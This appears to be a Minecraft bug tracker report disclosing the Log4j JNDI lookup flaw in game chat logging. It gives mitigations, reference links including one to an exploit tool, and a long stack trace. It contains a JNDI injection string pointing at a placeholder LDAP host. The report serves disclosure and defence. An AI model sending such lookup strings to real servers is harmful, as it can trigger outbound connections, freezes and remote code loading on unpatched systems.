MC-245078JNDI exploit in log4j
For further reference see:
- https://github.com/welk1n/JNDI-Injection-Exploit
- https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues
- https://github.com/apache/logging-log4j2/commit/c77b3cb.patch
- Other than the fix in 2.15.0 snapshots (released as is in 3 days if nothing else comes up, according to a vote from today), there is also this jvm startup parameter/system property, but it also disables otherwise useful log4j lookups: -Dlog4j2.formatMsgNoLookups=true
- (Old, but potentially relevant: https://nvd.nist.gov/vuln/detail/CVE-2019-17571)
- https://github.com/PaperMC/Paper/commit/b475c6a683fa34156b964f751985f36a784ca0e0
By simply writing chat messages that are then logged by log4j in the server console, you can make the remote server connect to websites/freeze the server while having it try to connect somewhere, same for the/other clients. Also reproducible in singleplayer, making the integrated server freeze.
With this invalid example address copy pasted into the client chat, you'd get the following error:
${jndi:ldap://some.web/www}
2021-12-09 16:55:15,949 Server thread WARN Error looking up JNDI resource [ldap://some.web/www]. javax.naming.CommunicationException: some.web:389 [Root exception is java.net.UnknownHostException: some.web] at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:253) at java.naming/com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at java.naming/com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1616) at java.naming/com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2848) at java.naming/com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:348) at java.naming/com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60) at java.naming/com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61) at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:204) at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94) at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409) at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172) at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56) at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:221) at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1110) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1033) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912) at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:467) at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132) at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38) at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:344) at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:334) at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:216) at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:59) at com.mojang.util.QueueLogAppender.append(QueueLogAppender.java:39) at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156) at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129) at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120) at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84) at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:540) at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:498) at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:481) at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:456) at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82) at org.apache.logging.log4j.core.Logger.log(Logger.java:161) at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2205) at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2159) at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2142) at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2017) at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1983) at org.apache.logging.log4j.spi.AbstractLogger.info(AbstractLogger.java:1320) at net.minecraft.server.MinecraftServer.a(SourceFile:998) at dm.a(SourceFile:249) at dn.a(SourceFile:282) at acj.bf(SourceFile:340) at acj.b(SourceFile:325) at net.minecraft.server.MinecraftServer.a(SourceFile:823) at net.minecraft.server.MinecraftServer.w(SourceFile:684) at net.minecraft.server.MinecraftServer.a(SourceFile:270) at java.base/java.lang.Thread.run(Thread.java:833) Caused by: java.net.UnknownHostException: some.web at java.base/sun.nio.ch.NioSocketImpl.connect(NioSocketImpl.java:567) at java.base/java.net.SocksSocketImpl.connect(SocksSocketImpl.java:327) at java.base/java.net.Socket.connect(Socket.java:633) at java.base/java.net.Socket.connect(Socket.java:583) at java.base/java.net.Socket.<init>(Socket.java:507) at java.base/java.net.Socket.<init>(Socket.java:287) at java.naming/com.sun.jndi.ldap.Connection.createSocket(Connection.java:346) at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:232) ... 48 more
